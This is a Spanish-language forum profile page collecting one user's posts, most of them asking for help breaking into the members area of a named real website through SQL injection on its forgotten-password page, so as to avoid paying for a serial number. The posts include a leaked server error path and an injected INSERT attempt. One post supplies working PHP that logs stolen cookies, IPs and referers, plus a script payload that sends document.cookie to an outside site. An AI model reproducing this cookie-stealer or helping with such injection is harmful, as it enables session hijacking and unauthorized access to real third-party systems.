Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - ifcaro

#11
Nivel Web / Re: Ayuda sql injection
6 Agosto 2006, 23:41 PM
Aver eso ya lo se. pero yo en un principio lo que keria es saber si por ahi podria conseguir algo para seguir investigando o si por ahi no hay nada que hacer y buscar por otro lado
#12
Nivel Web / Re: Ayuda sql injection
6 Agosto 2006, 23:28 PM
Si hay un formulario para registrarse pero hay que escribir el numero de serie del programa. si tuviera pelas pa comprarmelo pues no habria problema pero no las tengo :(

Si supiera algo de sql... pero lo unico que se es lo tipico de

SELECT * from users WHERE user=='usuario'

y dudo mucho que sea asi. por eso no sabria que consulta hacer para que me diera un error con alguna informacion comprometida. e leido algunos textos pero me e kedao igual
#13
Yo en mi servidor de www.wwwpuntocom.com use este codigo y si m funciono:

guarda la variable ?c= en el archivo steal.php


//cookies.php
<?php
$cookie 
$_GET['c'];
$ip getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp fopen('steal.php''a');
fwrite($fp'
Cookie: '
.$cookie.'   <br>
IP: ' 
.$ip' <br>
Date and Time: ' 
.$date'   <br>
Referer: '
.$referer.' <br><br>');
fclose($fp);
?>


usa el codigo

<script>window.location=site.com/cookies.php?c='+document.cookie;</script>

#14
Nivel Web / Re: Ayuda sql injection
6 Agosto 2006, 22:41 PM
El problema es que donde esta el fallo es en la pagina de "olvide mi contraseña" y lo que pide es el usuario y el email y funciona mas o menos asi:


_forgotten_password.php

if (usuario=="") {
die("NO USUARIO"); //Si el usuario esta en blanco error
}

if (email=="") {
die("NO EMAIL"); //Si el email esta en blanco error
}

if (usuario!=""){

//Consulta a la base de datos

If (email==email) { //Si el email es como el de la bd

mail() //Envia la contraseña o lo q haga
}
}

Lo que se me ocurrio fue intentar añadirme a la base de datos o engañarla para que me enviara la contraseña de otro usuario poniendo algo como


' insert into users values('usuario', 'password')

Pero no se si sera posible. esa es mi duda
#15
Nivel Web / Ayuda sql injection
4 Agosto 2006, 02:40 AM
Hola a todos

Llevo un tiempo intentando entrar en la zona de usuarios de una pagina. Mi objetivo seria poder hacerme usuario pero para ello necesito el numero de serie de un programa y no le tengo. El caso es q intente hacer sql injection para ver si podia entrar con el nombre de otro usuario o en el mejor de los casos crearme uno pero la pagina solo muestra:

ERROR:Internal error

Pero he descubierto en un sitio que poniendo un nombre cualquiera y despues ' al enviar la pagina responde:

Escribiendo:

usuario' cualquier cosa

Aparece:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/blitzbasic/domains/blitzbasic.com/public_html/Account/_forgotten_password.php on line 13
ERROR:Username not recognised.


No tengo mucha experiencia en esto pero creo que de ahi podria sacar algun modo de poder entrar a la zona de usuarios pa poder bajarme unas actualizaciones
#16
Ingeniería Inversa / Re: Softice y XP
30 Agosto 2004, 09:50 AM
Yo me he bajado el Softice 4.2.7 para Windows Nt y me a funcionao en el xp sin ningun parche.

Pongo un link a mi web donde lo podeis descargar:

http://usuarios.lycos.es/ifcaro/modules.php?name=Downloads&d_op=getit&lid=5